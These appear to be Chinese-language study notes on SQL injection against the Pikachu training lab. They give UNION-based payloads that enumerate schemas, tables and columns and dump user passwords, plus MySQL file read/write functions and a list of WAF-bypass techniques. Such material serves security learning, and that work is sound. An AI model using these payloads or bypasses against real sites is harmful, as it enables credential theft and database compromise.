高权限注入以及低权限注入
#跨库查询
获取所有数据库名
?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
获取指定数据库pikachu的表名信息
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='pikachu'
获取数据库pikachu表名users下的列名信息
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='pikachu'
获取指定pikacu下的users数据
?id=-1 union select 1,username,password from pikachu.users
#文件读写操作(mysql)
load_file():读取文件
into outfile或into dumpfile:导出函数
路径常见获取方法:
报错显示,遗留文件,漏洞报错,平台配置文件,爆破等
防护:
魔术引号开关,addslashes()
编码或字节绕过
内置函数过滤
关键字过滤
大小写编码绕过,根据实际情况
waf防护软件:
安全狗,宝塔,云盾等
绕过:
更改提交放法
大小写混合
加解密
注释符混用
等价函数替换
特殊符号混用
借助数据库特性
http参数污染
垃圾数据溢出
低版本
暴力查询